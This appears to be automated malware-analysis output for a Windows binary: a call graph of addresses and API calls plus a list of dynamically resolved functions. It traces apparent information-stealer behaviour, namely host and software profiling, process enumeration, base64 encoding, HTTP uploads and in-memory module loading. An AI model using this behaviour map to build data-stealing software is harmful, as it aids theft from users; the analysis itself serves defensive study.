74939->74940 74940->74935 74940->74936 74940->74938 74940->74939 75701 41ade0 74941->75701 74943 4112a7 strtok_s 74947 4112b4 74943->74947 74944 41137b strtok_s 74944->74947 74945 41139f 74945->73706 74946 41ab30 lstrlenA lstrcpy 74946->74947 74947->74944 74947->74945 74947->74946 75702 41ade0 74948->75702 74950 410fe7 strtok_s 74956 410ff4 74950->74956 74951 411123 strtok_s 74951->74956 74952 411147 74952->73714 74953 4110d4 StrCmpCA 74953->74956 74954 411057 StrCmpCA 74954->74956 74955 411097 StrCmpCA 74955->74956 74956->74951 74956->74952 74956->74953 74956->74954 74956->74955 74957 41ab30 lstrlenA lstrcpy 74956->74957 74957->74956 75703 41ade0 74958->75703 74960 411197 strtok_s 74962 4111a4 74960->74962 74961 411274 74961->73722 74962->74961 74963 4111e2 StrCmpCA 74962->74963 74964 41ab30 lstrlenA lstrcpy 74962->74964 74965 411250 strtok_s 74962->74965 74963->74962 74964->74962 74965->74962 74967 41aa50 lstrcpy 74966->74967 74968 411c76 74967->74968 74969 41acc0 4 API calls 74968->74969 74970 411c87 74969->74970 74971 41abb0 lstrcpy 74970->74971 74972 411c90 74971->74972 74973 41acc0 4 API calls 74972->74973 74974 411cab 74973->74974 74975 41abb0 lstrcpy 74974->74975 74976 411cb4 74975->74976 74977 41acc0 4 API calls 74976->74977 74978 411ccd 74977->74978 74979 41abb0 lstrcpy 74978->74979 74980 411cd6 74979->74980 74981 41acc0 4 API calls 74980->74981 74982 411cf1 74981->74982 74983 41abb0 lstrcpy 74982->74983 74984 411cfa 74983->74984 74985 41acc0 4 API calls 74984->74985 74986 411d13 74985->74986 74987 41abb0 lstrcpy 74986->74987 74988 411d1c 74987->74988 74989 41acc0 4 API calls 74988->74989 74990 411d37 74989->74990 74991 41abb0 lstrcpy 74990->74991 74992 411d40 74991->74992 74993 41acc0 4 API calls 74992->74993 74994 411d59 74993->74994 74995 41abb0 lstrcpy 74994->74995 74996 411d62 74995->74996 74997 41acc0 4 API calls 74996->74997 74998 411d7d 74997->74998 74999 41abb0 lstrcpy 74998->74999 75000 411d86 74999->75000 75001 41acc0 4 API calls 75000->75001 75002 411d9f 75001->75002 75003 41abb0 lstrcpy 75002->75003 75004 411da8 75003->75004 75005 41acc0 4 API calls 75004->75005 75006 411dc6 75005->75006 75007 41abb0 lstrcpy 75006->75007 75008 411dcf 75007->75008 75009 417690 6 API calls 75008->75009 75010 411de6 75009->75010 75011 41ac30 3 API calls 75010->75011 75012 411df9 75011->75012 75013 41abb0 lstrcpy 75012->75013 75014 411e02 75013->75014 75015 41acc0 4 API calls 75014->75015 75016 411e2c 75015->75016 75017 41abb0 lstrcpy 75016->75017 75018 411e35 75017->75018 75019 41acc0 4 API calls 75018->75019 75020 411e55 75019->75020 75021 41abb0 lstrcpy 75020->75021 75022 411e5e 75021->75022 75704 417820 GetProcessHeap HeapAlloc 75022->75704 75025 41acc0 4 API calls 75026 411e7e 75025->75026 75027 41abb0 lstrcpy 75026->75027 75028 411e87 75027->75028 75029 41acc0 4 API calls 75028->75029 75030 411ea6 75029->75030 75031 41abb0 lstrcpy 75030->75031 75032 411eaf 75031->75032 75033 41acc0 4 API calls 75032->75033 75034 411ed0 75033->75034 75035 41abb0 lstrcpy 75034->75035 75036 411ed9 75035->75036 75711 417950 GetCurrentProcess IsWow64Process 75036->75711 75039 41acc0 4 API calls 75040 411ef9 75039->75040 75041 41abb0 lstrcpy 75040->75041 75042 411f02 75041->75042 75043 41acc0 4 API calls 75042->75043 75044 411f21 75043->75044 75045 41abb0 lstrcpy 75044->75045 75046 411f2a 75045->75046 75047 41acc0 4 API calls 75046->75047 75048 411f4b 75047->75048 75049 41abb0 lstrcpy 75048->75049 75050 411f54 75049->75050 75051 4179e0 3 API calls 75050->75051 75052 411f64 75051->75052 75053 41acc0 4 API calls 75052->75053 75054 411f74 75053->75054 75055 41abb0 lstrcpy 75054->75055 75056 411f7d 75055->75056 75057 41acc0 4 API calls 75056->75057 75058 411f9c 75057->75058 75059 41abb0 lstrcpy 75058->75059 75060 411fa5 75059->75060 75061 41acc0 4 API calls 75060->75061 75062 411fc5 75061->75062 75063 41abb0 lstrcpy 75062->75063 75064 411fce 75063->75064 75065 417a70 3 API calls 75064->75065 75066 411fde 75065->75066 75067 41acc0 4 API calls 75066->75067 75068 411fee 75067->75068 75069 41abb0 lstrcpy 75068->75069 75070 411ff7 75069->75070 75071 41acc0 4 API calls 75070->75071 75072 412016 75071->75072 75073 41abb0 lstrcpy 75072->75073 75074 41201f 75073->75074 75075 41acc0 4 API calls 75074->75075 75076 412040 75075->75076 75077 41abb0 lstrcpy 75076->75077 75078 412049 75077->75078 75713 417b10 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 75078->75713 75081 41acc0 4 API calls 75082 412069 75081->75082 75083 41abb0 lstrcpy 75082->75083 75084 412072 75083->75084 75085 41acc0 4 API calls 75084->75085 75086 412091 75085->75086 75087 41abb0 lstrcpy 75086->75087 75088 41209a 75087->75088 75089 41acc0 4 API calls 75088->75089 75090 4120bb 75089->75090 75091 41abb0 lstrcpy 75090->75091 75092 4120c4 75091->75092 75715 417bc0 GetProcessHeap HeapAlloc GetTimeZoneInformation 75092->75715 75095 41acc0 4 API calls 75096 4120e4 75095->75096 75097 41abb0 lstrcpy 75096->75097 75098 4120ed 75097->75098 75099 41acc0 4 API calls 75098->75099 75100 41210c 75099->75100 75101 41abb0 lstrcpy 75100->75101 75102 412115 75101->75102 75103 41acc0 4 API calls 75102->75103 75104 412135 75103->75104 75105 41abb0 lstrcpy 75104->75105 75106 41213e 75105->75106 75718 417c90 GetUserDefaultLocaleName 75106->75718 75109 41acc0 4 API calls 75110 41215e 75109->75110 75111 41abb0 lstrcpy 75110->75111 75112 412167 75111->75112 75113 41acc0 4 API calls 75112->75113 75114 412186 75113->75114 75115 41abb0 lstrcpy 75114->75115 75116 41218f 75115->75116 75117 41acc0 4 API calls 75116->75117 75118 4121b0 75117->75118 75119 41abb0 lstrcpy 75118->75119 75120 4121b9 75119->75120 75723 417d20 75120->75723 75122 4121d0 75123 41ac30 3 API calls 75122->75123 75124 4121e3 75123->75124 75125 41abb0 lstrcpy 75124->75125 75126 4121ec 75125->75126 75127 41acc0 4 API calls 75126->75127 75128 412216 75127->75128 75129 41abb0 lstrcpy 75128->75129 75130 41221f 75129->75130 75131 41acc0 4 API calls 75130->75131 75132 41223f 75131->75132 75133 41abb0 lstrcpy 75132->75133 75134 412248 75133->75134 75735 417f10 GetSystemPowerStatus 75134->75735 75137 41acc0 4 API calls 75138 412268 75137->75138 75139 41abb0 lstrcpy 75138->75139 75140 412271 75139->75140 75141 41acc0 4 API calls 75140->75141 75142 412290 75141->75142 75143 41abb0 lstrcpy 75142->75143 75144 412299 75143->75144 75145 41acc0 4 API calls 75144->75145 75146 4122ba 75145->75146 75147 41abb0 lstrcpy 75146->75147 75148 4122c3 75147->75148 75149 4122ce GetCurrentProcessId 75148->75149 75737 419600 OpenProcess 75149->75737 75152 41ac30 3 API calls 75153 4122f4 75152->75153 75154 41abb0 lstrcpy 75153->75154 75155 4122fd 75154->75155 75156 41acc0 4 API calls 75155->75156 75157 412327 75156->75157 75158 41abb0 lstrcpy 75157->75158 75159 412330 75158->75159 75160 41acc0 4 API calls 75159->75160 75161 412350 75160->75161 75162 41abb0 lstrcpy 75161->75162 75163 412359 75162->75163 75742 417f90 GetProcessHeap HeapAlloc RegOpenKeyExA 75163->75742 75166 41acc0 4 API calls 75167 412379 75166->75167 75168 41abb0 lstrcpy 75167->75168 75169 412382 75168->75169 75170 41acc0 4 API calls 75169->75170 75171 4123a1 75170->75171 75172 41abb0 lstrcpy 75171->75172 75173 4123aa 75172->75173 75174 41acc0 4 API calls 75173->75174 75175 4123cb 75174->75175 75176 41abb0 lstrcpy 75175->75176 75177 4123d4 75176->75177 75746 4180f0 75177->75746 75180 41acc0 4 API calls 75181 4123f4 75180->75181 75182 41abb0 lstrcpy 75181->75182 75183 4123fd 75182->75183 75184 41acc0 4 API calls 75183->75184 75185 41241c 75184->75185 75186 41abb0 lstrcpy 75185->75186 75187 412425 75186->75187 75188 41acc0 4 API calls 75187->75188 75189 412446 75188->75189 75190 41abb0 lstrcpy 75189->75190 75191 41244f 75190->75191 75761 418060 GetSystemInfo wsprintfA 75191->75761 75194 41acc0 4 API calls 75195 41246f 75194->75195 75196 41abb0 lstrcpy 75195->75196 75197 412478 75196->75197 75198 41acc0 4 API calls 75197->75198 75199 412497 75198->75199 75200 41abb0 lstrcpy 75199->75200 75201 4124a0 75200->75201 75202 41acc0 4 API calls 75201->75202 75203 4124c0 75202->75203 75204 41abb0 lstrcpy 75203->75204 75205 4124c9 75204->75205 75763 418290 GetProcessHeap HeapAlloc 75205->75763 75208 41acc0 4 API calls 75209 4124e9 75208->75209 75210 41abb0 lstrcpy 75209->75210 75211 4124f2 75210->75211 75212 41acc0 4 API calls 75211->75212 75213 412511 75212->75213 75214 41abb0 lstrcpy 75213->75214 75215 41251a 75214->75215 75216 41acc0 4 API calls 75215->75216 75217 41253b 75216->75217 75218 41abb0 lstrcpy 75217->75218 75219 412544 75218->75219 75769 418950 75219->75769 75222 41ac30 3 API calls 75223 41256e 75222->75223 75224 41abb0 lstrcpy 75223->75224 75225 412577 75224->75225 75226 41acc0 4 API calls 75225->75226 75227 4125a1 75226->75227 75228 41abb0 lstrcpy 75227->75228 75229 4125aa 75228->75229 75230 41acc0 4 API calls 75229->75230 75231 4125ca 75230->75231 75232 41abb0 lstrcpy 75231->75232 75233 4125d3 75232->75233 75234 41acc0 4 API calls 75233->75234 75235 4125f2 75234->75235 75236 41abb0 lstrcpy 75235->75236 75237 4125fb 75236->75237 75774 418380 75237->75774 75239 412612 75240 41ac30 3 API calls 75239->75240 75241 412625 75240->75241 75242 41abb0 lstrcpy 75241->75242 75243 41262e 75242->75243 75244 41acc0 4 API calls 75243->75244 75245 41265a 75244->75245 75246 41abb0 lstrcpy 75245->75246 75247 412663 75246->75247 75248 41acc0 4 API calls 75247->75248 75249 412682 75248->75249 75250 41abb0 lstrcpy 75249->75250 75251 41268b 75250->75251 75252 41acc0 4 API calls 75251->75252 75253 4126ac 75252->75253 75254 41abb0 lstrcpy 75253->75254 75255 4126b5 75254->75255 75256 41acc0 4 API calls 75255->75256 75257 4126d4 75256->75257 75258 41abb0 lstrcpy 75257->75258 75259 4126dd 75258->75259 75260 41acc0 4 API calls 75259->75260 75261 4126fe 75260->75261 75262 41abb0 lstrcpy 75261->75262 75263 412707 75262->75263 75782 4184b0 75263->75782 75265 412723 75266 41ac30 3 API calls 75265->75266 75267 412736 75266->75267 75268 41abb0 lstrcpy 75267->75268 75269 41273f 75268->75269 75270 41acc0 4 API calls 75269->75270 75271 412769 75270->75271 75272 41abb0 lstrcpy 75271->75272 75273 412772 75272->75273 75274 41acc0 4 API calls 75273->75274 75275 412793 75274->75275 75276 41abb0 lstrcpy 75275->75276 75277 41279c 75276->75277 75278 4184b0 17 API calls 75277->75278 75279 4127b8 75278->75279 75280 41ac30 3 API calls 75279->75280 75281 4127cb 75280->75281 75282 41abb0 lstrcpy 75281->75282 75283 4127d4 75282->75283 75284 41acc0 4 API calls 75283->75284 75285 4127fe 75284->75285 75286 41abb0 lstrcpy 75285->75286 75287 412807 75286->75287 75288 41acc0 4 API calls 75287->75288 75289 412826 75288->75289 75290 41abb0 lstrcpy 75289->75290 75291 41282f 75290->75291 75292 41acc0 4 API calls 75291->75292 75293 412850 75292->75293 75294 41abb0 lstrcpy 75293->75294 75295 412859 75294->75295 75818 418810 75295->75818 75297 412870 75298 41ac30 3 API calls 75297->75298 75299 412883 75298->75299 75300 41abb0 lstrcpy 75299->75300 75301 41288c 75300->75301 75302 4128aa lstrlenA 75301->75302 75303 4128ba 75302->75303 75304 41aa50 lstrcpy 75303->75304 75305 4128cc 75304->75305 75306 401590 lstrcpy 75305->75306 75307 4128dd 75306->75307 75828 4153e0 75307->75828 75309 4128e9 75309->73726 76022 41ade0 75310->76022 75312 405059 InternetOpenUrlA 75316 405071 75312->75316 75313 4050f0 EntryPoint InternetCloseHandle 75315 40513c 75313->75315 75314 40507a InternetReadFile 75314->75316 75315->73730 75316->75313 75316->75314 75317 4050c0 memcpy 75316->75317 75317->75316 76023 409960 75318->76023 75320 4108b9 75321 41aa50 lstrcpy 75320->75321 75322 4108d7 75321->75322 76026 419850 75322->76026 75324 4108dc 76032 40a090 LoadLibraryA 75324->76032 75327 410905 75330 410921 StrCmpCA 75327->75330 75328 410c14 75329 401590 lstrcpy 75328->75329 75331 410c25 75329->75331 75332 410930 75330->75332 75366 4109ea 75330->75366 76219 4103b0 75331->76219 75334 41aab0 lstrcpy 75332->75334 75337 41094d 75334->75337 75336 410a0b StrCmpCA 75383 410b47 75336->75383 75366->75336 75654 41aab0 lstrcpy 75653->75654 75655 4016c3 75654->75655 75656 41aab0 lstrcpy 75655->75656 75657 4016d5 75656->75657 75658 41aab0 lstrcpy 75657->75658 75659 4016e7 75658->75659 75660 41aab0 lstrcpy 75659->75660 75661 4015a3 75660->75661 75661->74557 75690 401030 75662->75690 75666 404888 lstrlenA 75693 41ade0 75666->75693 75668 404898 InternetCrackUrlA 75669 4048b7 75668->75669 75669->74634 75671 41aa50 lstrcpy 75670->75671 75672 418d04 75671->75672 75673 41aa50 lstrcpy 75672->75673 75674 418d12 GetSystemTime 75673->75674 75675 418d29 75674->75675 75676 41aab0 lstrcpy 75675->75676 75677 418d8c 75676->75677 75677->74649 75679 41ac41 75678->75679 75680 41ac98 75679->75680 75682 41ac78 lstrcpy lstrcatA 75679->75682 75681 41aab0 lstrcpy 75680->75681 75683 41aca4 75681->75683 75682->75680 75683->74653 75684->74767 75686 40a249 LocalAlloc 75685->75686 75687 404f3e 75685->75687 75686->75687 75688 40a264 CryptStringToBinaryA 75686->75688 75687->74655 75687->74658 75688->75687 75689 40a289 LocalFree 75688->75689 75689->75687 75691 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 75690->75691 75692 41ade0 75691->75692 75692->75666 75693->75668 75694->74777 75695->74922 75696->74924 75697->74926 75698->74928 75699->74932 75700->74934 75701->74943 75702->74950 75703->74960 75835 417930 75704->75835 75707 417856 RegOpenKeyExA 75709 417894 RegCloseKey 75707->75709 75710 417877 RegQueryValueExA 75707->75710 75708 411e6e 75708->75025 75709->75708 75710->75709 75712 411ee9 75711->75712 75712->75039 75714 412059 75713->75714 75714->75081 75716 417c2a wsprintfA 75715->75716 75717 4120d4 75715->75717 75716->75717 75717->75095 75719 41214e 75718->75719 75720 417cdd 75718->75720 75719->75109 75842 418eb0 LocalAlloc CharToOemW 75720->75842 75722 417ce9 75722->75719 75724 41aa50 lstrcpy 75723->75724 75725 417d5c GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 75724->75725 75734 417db5 75725->75734 75726 417dd6 GetLocaleInfoA 75726->75734 75727 417ea8 75728 417eb8 75727->75728 75729 417eae LocalFree 75727->75729 75731 41aab0 lstrcpy 75728->75731 75729->75728 75730 41acc0 lstrcpy lstrlenA lstrcpy lstrcatA 75730->75734 75733 417ec7 75731->75733 75732 41abb0 lstrcpy 75732->75734 75733->75122 75734->75726 75734->75727 75734->75730 75734->75732 75736 412258 75735->75736 75736->75137 75738 419623 K32GetModuleFileNameExA CloseHandle 75737->75738 75739 419645 75737->75739 75738->75739 75740 41aa50 lstrcpy 75739->75740 75741 4122e1 75740->75741 75741->75152 75743 412369 75742->75743 75744 417ff8 RegQueryValueExA 75742->75744 75743->75166 75745 41801e RegCloseKey 75744->75745 75745->75743 75747 418149 GetLogicalProcessorInformationEx 75746->75747 75748 4181b9 75747->75748 75749 418168 GetLastError 75747->75749 75845 418b80 GetProcessHeap HeapFree 75748->75845 75750 418173 75749->75750 75751 4181b2 75749->75751 75760 41817c 75750->75760 75759 4123e4 75751->75759 75846 418b80 GetProcessHeap HeapFree 75751->75846 75756 41820b 75758 418214 wsprintfA 75756->75758 75756->75759 75757 4181a6 75757->75759 75758->75759 75759->75180 75760->75747 75760->75757 75843 418b80 GetProcessHeap HeapFree 75760->75843 75844 418ba0 GetProcessHeap HeapAlloc 75760->75844 75762 41245f 75761->75762 75762->75194 75764 418b40 75763->75764 75765 4182dd GlobalMemoryStatusEx 75764->75765 75768 4182f3 __aulldiv 75765->75768 75766 41832b wsprintfA 75767 4124d9 75766->75767 75767->75208 75768->75766 75770 41898b GetProcessHeap HeapAlloc wsprintfA 75769->75770 75772 41aa50 lstrcpy 75770->75772 75773 41255b 75772->75773 75773->75222 75775 41aa50 lstrcpy 75774->75775 75777 4183b9 75775->75777 75776 4183f3 75778 41aab0 lstrcpy 75776->75778 75777->75776 75780 41acc0 lstrcpy lstrlenA lstrcpy lstrcatA 75777->75780 75781 41abb0 lstrcpy 75777->75781 75779 41846c 75778->75779 75779->75239 75780->75777 75781->75777 75783 41aa50 lstrcpy 75782->75783 75784 4184ec RegOpenKeyExA 75783->75784 75785 418560 75784->75785 75786 41853e 75784->75786 75788 4187a3 RegCloseKey 75785->75788 75789 418588 RegEnumKeyExA 75785->75789 75787 41aab0 lstrcpy 75786->75787 75799 41854d 75787->75799 75792 41aab0 lstrcpy 75788->75792 75790 4185cf wsprintfA RegOpenKeyExA 75789->75790 75791 41879e 75789->75791 75793 418651 RegQueryValueExA 75790->75793 75794 418615 RegCloseKey RegCloseKey 75790->75794 75791->75788 75792->75799 75795 418791 RegCloseKey 75793->75795 75796 41868a lstrlenA 75793->75796 75797 41aab0 lstrcpy 75794->75797 75795->75791 75796->75795 75798 4186a0 75796->75798 75797->75799 75800 41acc0 4 API calls 75798->75800 75799->75265 75801 4186b7 75800->75801 75802 41abb0 lstrcpy 75801->75802 75803 4186c3 75802->75803 75804 41acc0 4 API calls 75803->75804 75805 4186e7 75804->75805 75806 41abb0 lstrcpy 75805->75806 75807 4186f3 75806->75807 75808 4186fe RegQueryValueExA 75807->75808 75808->75795 75809 418733 75808->75809 75810 41acc0 4 API calls 75809->75810 75811 41874a 75810->75811 75812 41abb0 lstrcpy 75811->75812 75813 418756 75812->75813 75814 41acc0 4 API calls 75813->75814 75815 41877a 75814->75815 75816 41abb0 lstrcpy 75815->75816 75817 418786 75816->75817 75817->75795 75819 41aa50 lstrcpy 75818->75819 75820 41884c CreateToolhelp32Snapshot Process32First 75819->75820 75821 418878 Process32Next 75820->75821 75822 4188ed CloseHandle 75820->75822 75821->75822 75824 41888d 75821->75824 75823 41aab0 lstrcpy 75822->75823 75825 418906 75823->75825 75824->75821 75826 41acc0 lstrcpy lstrlenA lstrcpy lstrcatA 75824->75826 75827 41abb0 lstrcpy 75824->75827 75825->75297 75826->75824 75827->75824 75829 41aab0 lstrcpy 75828->75829 75830 415405 75829->75830 75831 401590 lstrcpy 75830->75831 75832 415416 75831->75832 75847 405150 75832->75847 75834 41541f 75834->75309 75838 4178b0 GetProcessHeap HeapAlloc RegOpenKeyExA 75835->75838 75837 417849 75837->75707 75837->75708 75839 417910 RegCloseKey 75838->75839 75840 4178f5 RegQueryValueExA 75838->75840 75841 417923 75839->75841 75840->75839 75841->75837 75842->75722 75843->75760 75844->75760 75845->75756 75846->75759 75848 41aab0 lstrcpy 75847->75848 75849 405169 75848->75849 75850 404800 5 API calls 75849->75850 75851 405175 75850->75851 76009 419030 75851->76009 75853 4051d4 75854 4051e2 lstrlenA 75853->75854 75855 4051f5 75854->75855 75856 419030 4 API calls 75855->75856 75857 405206 75856->75857 75858 41aa50 lstrcpy 75857->75858 75859 405219 75858->75859 75860 41aa50 lstrcpy 75859->75860 75861 405226 75860->75861 75862 41aa50 lstrcpy 75861->75862 75863 405233 75862->75863 75864 41aa50 lstrcpy 75863->75864 75865 405240 75864->75865 75866 41aa50 lstrcpy 75865->75866 75867 40524d InternetOpenA StrCmpCA 75866->75867 75868 40527f 75867->75868 75869 405914 InternetCloseHandle 75868->75869 75870 418cf0 3 API calls 75868->75870 75876 405929 codecvt 75869->75876 75871 40529e 75870->75871 75872 41ac30 3 API calls 75871->75872 75873 4052b1 75872->75873 75874 41abb0 lstrcpy 75873->75874 75875 4052ba 75874->75875 75877 41acc0 4 API calls 75875->75877 75879 41aab0 lstrcpy 75876->75879 75878 4052fb 75877->75878 75880 41ac30 3 API calls 75878->75880 75887 405963 75879->75887 75881 405302 75880->75881 75882 41acc0 4 API calls 75881->75882 75883 405309 75882->75883 75884 41abb0 lstrcpy 75883->75884 75885 405312 75884->75885 75886 41acc0 4 API calls 75885->75886 75888 405353 75886->75888 75887->75834 75889 41ac30 3 API calls 75888->75889 75890 40535a 75889->75890 75891 41abb0 lstrcpy 75890->75891 75892 405363 75891->75892 75893 405379 InternetConnectA 75892->75893 75893->75869 75894 4053a9 HttpOpenRequestA 75893->75894 75896 405907 InternetCloseHandle 75894->75896 75897 405407 75894->75897 75896->75869 75898 41acc0 4 API calls 75897->75898 75899 40541b 75898->75899 75900 41abb0 lstrcpy 75899->75900 75901 405424 75900->75901 75902 41ac30 3 API calls 75901->75902 75903 405442 75902->75903 75904 41abb0 lstrcpy 75903->75904 75905 40544b 75904->75905 75906 41acc0 4 API calls 75905->75906 75907 40546a 75906->75907 75908 41abb0 lstrcpy 75907->75908 75909 405473 75908->75909 75910 41acc0 4 API calls 75909->75910 75911 405494 75910->75911 75912 41abb0 lstrcpy 75911->75912 75913 40549d 75912->75913 75914 41acc0 4 API calls 75913->75914 76010 41903d CryptBinaryToStringA 76009->76010 76011 419039 76009->76011 76010->76011 76012 41905e GetProcessHeap RtlAllocateHeap 76010->76012 76011->75853 76012->76011 76013 419084 codecvt 76012->76013 76014 419095 CryptBinaryToStringA 76013->76014 76014->76011 76022->75312 76294 409910 ??2@YAPAXI 76023->76294 76025 409971 76025->75320 76352 41ade0 76026->76352 76028 419870 CreateFileA 76029 419891 WriteFile 76028->76029 76030 419880 76028->76030 76029->76030 76031 4198be CloseHandle 76029->76031 76030->75324 76031->76030 76033 40a0b3 GetProcAddress GetProcAddress 76032->76033 76034 40a0ac 76032->76034 76035 40a0f2 FreeLibrary 76033->76035 76036 40a0e9 76033->76036 76034->75327 76034->75328 76035->76034 76036->76035 76037 40a103 76036->76037 76037->76034 76297 407000 76294->76297 76296 40993d codecvt 76296->76025 76300 406d90 76297->76300 76301 406db3 76300->76301 76312 406da9 76300->76312 76318 406580 76301->76318 76305 406e0e 76305->76312 76330 406a00 76305->76330 76309 406e9a 76310 406f36 VirtualFree 76309->76310 76311 406f47 76309->76311 76309->76312 76310->76311 76313 406f91 76311->76313 76314 406f76 FreeLibrary 76311->76314 76315 406f88 76311->76315 76312->76296 76313->76312 76348 418b80 GetProcessHeap HeapFree 76313->76348 76314->76311 76347 418b80 GetProcessHeap HeapFree 76315->76347 76320 406592 76318->76320 76319 406599 76319->76312 76324 4066b0 76319->76324 76320->76319 76321 40661e 76320->76321 76349 418ba0 GetProcessHeap HeapAlloc 76321->76349 76323 406640 76323->76319 76327 4066df VirtualAlloc 76324->76327 76326 406780 76328 406793 VirtualAlloc 76326->76328 76329 40678c 76326->76329 76327->76326 76327->76329 76328->76329 76329->76305 76331 406a25 76330->76331 76332 406a19 76330->76332 76331->76312 76343 406c30 76331->76343 76332->76331 76333 406a59 LoadLibraryA 76332->76333 76334 406a78 76333->76334 76335 406a82 76333->76335 76334->76331 76339 406b30 76335->76339 76350 418ba0 GetProcessHeap HeapAlloc 76335->76350 76337 406adb 76337->76334 76340 406b21 76337->76340 76341 406afd memcpy 76337->76341 76338 406bf8 GetProcAddress 76338->76334 76338->76339 76339->76334 76339->76338 76351 418b80 GetProcessHeap HeapFree 76340->76351 76341->76340 76345 406c4b 76343->76345 76344 406cf9 76344->76309 76345->76344 76346 406cd0 VirtualProtect 76345->76346 76346->76344 76346->76345 76347->76313 76348->76312 76349->76323 76350->76337 76351->76339 76352->76028

                                                                                                                                              Executed Functions

                                                                                                                                              Function 00419F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 633 419f20-419f2a 634 419f30-41a341 GetProcAddress * 43 633->634 635 41a346-41a3da LoadLibraryA * 8 633->635 634->635 636 41a456-41a45d 635->636 637 41a3dc-41a451 GetProcAddress * 5 635->637 638 41a463-41a521 GetProcAddress * 8 636->638 639 41a526-41a52d 636->639 637->636 638->639 640 41a5a8-41a5af 639->640 641 41a52f-41a5a3 GetProcAddress * 5 639->641 642 41a5b5-41a642 GetProcAddress * 6 640->642 643 41a647-41a64e 640->643 641->640 642->643 644 41a654-41a72a GetProcAddress * 9 643->644 645 41a72f-41a736 643->645 644->645 646 41a7b2-41a7b9 645->646 647 41a738-41a7ad GetProcAddress * 5 645->647 648 41a7bb-41a7e7 GetProcAddress * 2 646->648 649 41a7ec-41a7f3 646->649 647->646 648->649 650 41a825-41a82c 649->650 651 41a7f5-41a820 GetProcAddress * 2 649->651 652 41a922-41a929 650->652 653 41a832-41a91d GetProcAddress * 10 650->653 651->650 654 41a92b-41a988 GetProcAddress * 4 652->654 655 41a98d-41a994 652->655 653->652 654->655 656 41a996-41a9a9 GetProcAddress 655->656 657 41a9ae-41a9b5 655->657 656->657 658 41a9b7-41aa13 GetProcAddress * 4 657->658 659 41aa18-41aa19 657->659 658->659
                                                                                                                                              APIs
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995D58), ref: 00419F3D
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995F18), ref: 00419F55
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,009998E8), ref: 00419F6E
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999900), ref: 00419F86
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999AC8), ref: 00419F9E
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999B10), ref: 00419FB7
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099BDF0), ref: 00419FCF
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999AF8), ref: 00419FE7
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999B88), ref: 0041A000
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999B28), ref: 0041A018
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999B40), ref: 0041A030
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995D98), ref: 0041A049
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995D78), ref: 0041A061
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995DD8), ref: 0041A079
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995E58), ref: 0041A092
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999AE0), ref: 0041A0AA
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999B58), ref: 0041A0C2
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099BFA8), ref: 0041A0DB
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995FB8), ref: 0041A0F3
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00999B70), ref: 0041A10B
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FE50), ref: 0041A124
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FC28), ref: 0041A13C
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FE68), ref: 0041A154
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995EB8), ref: 0041A16D
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FD18), ref: 0041A185
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FC40), ref: 0041A19D
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FE80), ref: 0041A1B6
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FD30), ref: 0041A1CE
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FD48), ref: 0041A1E6
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FC58), ref: 0041A1FF
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FD90), ref: 0041A217
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FE08), ref: 0041A22F
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FDA8), ref: 0041A248
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099BD08), ref: 0041A260
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FD60), ref: 0041A278
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FDF0), ref: 0041A291
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995F38), ref: 0041A2A9
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FE98), ref: 0041A2C1
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995F78), ref: 0041A2DA
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FEB0), ref: 0041A2F2
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,0099FBF8), ref: 0041A30A
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995FD8), ref: 0041A323
                                                                                                                                              • GetProcAddress.KERNEL32(74DD0000,00995FF8), ref: 0041A33B
                                                                                                                                              • LoadLibraryA.KERNEL32(0099FD78,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
